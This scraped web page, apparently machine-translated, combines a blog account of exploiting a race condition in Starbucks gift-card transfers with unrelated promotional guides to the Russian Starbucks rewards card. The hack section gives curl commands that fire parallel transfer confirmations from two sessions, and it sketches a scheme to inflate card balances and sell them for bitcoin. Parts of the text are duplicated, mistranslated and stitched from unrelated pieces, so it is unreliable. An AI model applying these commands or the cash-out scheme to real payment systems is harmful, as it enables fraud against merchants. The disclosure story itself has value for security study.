Starbucks payment card activation. Starbucks Rewards Card

This is the story of how I found a way to generate unlimited money for gift cards Starbucks, thereby ensuring yourself free coffee for life, or stealing a couple of million from them in other ways.

So, not long ago I came up with the idea of buying 3 Starbucks cards for $5 each.

Starbucks.com has a personal account where you can add these cards, view your balance, and even transfer money between cards.

There is such a little-known class of “race condition” vulnerabilities. I can say with confidence that most applications that may be vulnerable are most likely vulnerable to this attack, because not every programmer takes into account factors such as parallel code execution and its consequences when designing programs.

It also occurs in web applications, usually in functions related to the transfer of money/points/candy wrappers/vouchers. I’ll tell you about all the intricacies of operation another time, but for now let’s return to the transfer between cards in Starbucks.

The translation was built from several stateful requests. Schematically, the first request POST /step1?amount=1&from=wallet1&to=wallet2 put all these values into the session on the server, and only the second POST/step2?confirm transferred the data already stored in the session and cleared it.

This significantly complicates the operation of a relatively classic race, where you only need to repeat the same request several times at the same time. After all, as soon as the first request clears the session, the second one already encounters an empty session! And in order to somehow make this work, I would have to make a complex composition of requests that writes to the session immediately after it is cleared by the first request and before executing the second request. This might work once in a million times, or it might not work at all.

But there is always a workaround for such “semi-protections” - you can log into the same account from two different browsers/sessions. Then the operation looks something like this:

#set translation parameters in both sessions
curl starbucks/step1 -H "Cookie: session=session1" --data "amount=1&from=wallet1&to=wallet2"
curl starbucks/step1 -H "Cookie: session=session2" --data "amount=1&from=wallet1&to=wallet2"
#simultaneous approval of $1 transfer from card 1 to card 2.
curl starbucks/step2?confirm -H "Cookie: session=session1" & curl starbucks/step2?confirm -H "Cookie: session=session2" &

After 5 attempts, nothing interesting happened and I was about to give up. The peculiarity of the race condition is that you can only try to find it by a third-party attacker, because it is not known what protections are in place (number of requests by IP? requests per account? requests for action?) and the only way to check whether you are vulnerable is to carefully audit the source code for presence of proper pessimistic locks in the database.

On the 6th request, a miracle happened - the transfer was made twice and I had two cards with 15 and 5 dollars, 20 in total. To consider this a proof of concept, all that remains is to make sure that the store will accept these cards.

I went to the nearest working Starbucks on market st.

Give me $16 worth of something.
- O_o.
- Well, what is your most valuable possession?
- Those sandwiches over there.

It came out to $16.70.

So, $15 was invested in our small operation Y, and purchases were made at 16.70. Knowing the attitude of the most humane US court towards hackers, when I returned home, I immediately credited another $10 from my credit card to my Starbucks card, so as not to owe the corporation as much as $1.70, you never know.

Next comes the most difficult part - the reporting process. The support honestly answered that they couldn’t connect me with the technical team, well, not at all, and they were very sorry that I felt this way. Posted by [email protected] March 23, silence (by the way, they responded as early as April 29). I had to find people who cared through my friends and acquaintances, and only after 10 days the vulnerability was fixed.

No one said thank you, but an unambiguous hint was made that I had committed “fraud” and “malicious actions” and that they would still think about what to do with me.

What could I do? I could start a farm of fake gift cards purchased in different stores around the world, generate a lot of money on them and sell them on special promotional sites with a 50 percent discount (so as not to arouse suspicion) for bitcoins. So, after working for a year or two, you could suck out a couple of million dollars from this friendly company with sweet coffee.

May 21, 2015 at 12:01 pm

How I Hacked Starbucks for Unlimited Coffee

Information Security ,
Website development

This is the story of how I found a way to generate unlimited money for Starbucks gift cards, thereby ensuring myself free coffee for life, or stealing a couple of million from them in other ways.

So, not long ago I came up with the idea of buying 3 Starbucks cards for $5 each.

Starbucks.com has a personal account where you can add these cards, view your balance, and even transfer money between cards.

But there is always a workaround for such “semi-protections” - you can log into the same account from two different browsers/sessions. Then the operation looks something like this:

I went to the nearest working Starbucks on market st.

Give me $16 worth of something.
- O_o.
- Well, what is your most valuable possession?
- Those sandwiches over there.

It came out to $16.70.

No one said thank you, but an unambiguous hint was made that I had committed “fraud” and “malicious actions” and that they would still think about what to do with me.

Having a Starbucks Card is a real award for a coffee connoisseur. A distinctive sign that also makes life better. The Starbucks company has created its internal currency Stars, by receiving and accumulating which Program Participants can exchange them for bonuses in Starbucks coffee shops.

To become part Bonus program, just go to the official website starbuckscard.ru and register your card. There you will also find a list of establishments that participate in the promotion.

Get a card at physical form You can choose the design you like at any cafe in the chain and immediately top up your balance with an amount from 500 to 10,000 rubles to make further purchases. You can also buy online map StarbucksGifts on the website http://starbuckscoffee.ru/ru/.

How to register a Starbucks card?

Registering a Starbucks card turns it from just a convenient means of payment into a generator of gifts and bonuses.

To access them you can use one of the following methods:

Step 1. Go to the website http://starbuckscoffee.ru/ru/

Step 2. Create a personal account following detailed instructions

Step 3. Register a Starbucks Card or StarbucksGifts on the website.

Download the Starbucks mobile app.
Create an account.
Register your Starbucks Card or StarbucksGifts Card in the App.

Starbucks card levels

The number of gifts and bonuses from Starbucks depends entirely on the activity of the Program Participant and his love for coffee drinks. After each purchase made, the card is assigned one Star.

The more Stars, the higher the status of the card.

Green level

The green level of the card is assigned to the member immediately after purchasing the card and to maintain it, it is necessary to make at least one purchase within a year after registering the card on starbuckscoffeeru. If during this time the card balance has not been replenished with stars, the Green Level privileges are frozen.

Gold level

You can move to the Gold level from the Green level after receiving 30 stars in a year.

Features of the Starbucks card

The Card balance is reliably protected from theft and can be restored in case of loss. Such a Card can be an excellent gift with a recognizable “Paper Hearts” or “Summer” design.

Also, registering for a Starbucks card means having access to all transactions, checking your balance directly from your mobile device, tracking bonus activity and privileges.

Green Level Privileges

Gold Level Privileges

The ability to receive any drink or one dish for every new 12 stars, with the exception of whole cakes.
Any drink or dish, excluding whole cakes, as a gift for your birthday.
Updated design in gold color.
Participation in special offers, which are distributed via SMS or e-mail newsletter.

How to use the Starbucks mobile app?

The Starbucks mobile app is compatible with all devices. Thanks to it, you can view the nearest coffee shops, carry out transactions with your balance and auto-replenishment, make transactions between cards and keep abreast of special promotions and offers.

The Starbucks bonus program brings its customers even closer to coffee, allowing them to profitably travel through the assortment of coffee beans, not only with benefits for the body and soul, but also with a reasonable replenishment and budget savings.

Starbucks coffee shops are a popular relaxation and meeting place for lovers of quality coffee and a relaxed atmosphere. The company once started by selling branded roasted beans, and now it is opening establishments where every visitor can not only taste a delicious coffee drink, but also have breakfast or a snack, as well as purchase professional equipment for brewing coffee and branded accessories for serving. Representatives of the company in Russia take care of their customers and offer participation in the “My Starbucks Rewards” program.

How to get a card

Any client of the coffee shop chain over 14 years of age has the right to receive a bonus card for free. It needs to be replenished in cash and pay for all goods on the territory of the Starbucks cafe. For each purchase the client receives 1 star. 12 collected stars give the right to receive a “reward” in the form of free coffee, tea or food, except whole pies and cakes.

This is what the rewards map looks like.

Plastic media can be issued at any Starbucks outlet at the checkout or you can create a virtual equivalent online in the Starbucks Russia mobile application. The card is activated after registration on the site www.starbuckscard.ru and the first replenishment.

Features of use

The Starbucks card allows the owner to receive nice bonuses, however, you need to know how to use it correctly:

After registering for the My Starbucks Rewards program, you must activate the card on the website www.starbuckscard.ru and deposit minimum amount in the amount of 500 rubles. Activation occurs within 24 hours.
To credit bonuses you need to pay for the product only Starbucks card.
The reward is valid for 30 days from the date of assignment; if this period is avoided, the bonus is reset to zero.
You can view your balance, history of debits and accrual of bonuses, as well as replenish your account through your personal account on the website www.starbuckscard.ru or through mobile app. Using the latter also makes it possible to pay for an order directly from the phone screen (when registering a virtual card).
On the company's website it is possible to configure automatic and one-time replenishment plastic or virtual media accounts. To do this, you need to connect your payment bank card in your personal profile and make a one-time payment or set up a permanent replenishment. Available scenarios: money will be credited when the minimum balance is reached, on a certain day of each week or day of the month.

Program levels

When registering in the bonus savings system, the buyer receives a card Green level. To prevent your collected stars from being reset, you must make at least 1 purchase within 12 consecutive months. Otherwise, you can lose all the accumulated stars. Green level makes it possible to exchange 12 stars for a coffee drink or dish.

Gold level awarded subject to the accumulation of 30 or more stars throughout the year. Privilege:

Bonus free order of any product from the range of drinks or food in exchange for 12 accumulated stars;
Birthday greeting promotion - the opportunity to receive free coffee or a dish in honor of the holiday;
Gold card design;
Exclusive promotions that can be tailored to personal preferences when choosing products or payment methods. You can also get a discount on food or drinks.

Creation personal account allows you to perform useful manipulations with the card. These include: activation, checking balance and rewards, one-time or periodic auto-replenishment, viewing transaction history.

To register an account, go to the website www.starbuckscard.ru and select the "Registration" tab.

Then enter your phone number and click on the “Get code” button.

In the window that opens, enter the received code.

Next, fields for specifying the number and PIN code will become available (it is located on the back of the plastic carrier under the scratch panel next to the 12 digit number) the card and personal data received in the cafe. You can also confirm receipt of news and promotions by email.

Mobile application "Starbucks Russia"

For the convenience of customers, Starbucks has developed and introduced a program for Android And iOS. The functionality of the application allows you to activate already existing map and scan the barcode or create a fully electronic version, learn about new promotions and offers, and find the nearest coffee shops. In "Starbucks Russia" you can view the details of your personal account.

You can top up your card and pay for your order online.

The application will also notify you about the availability of rewards.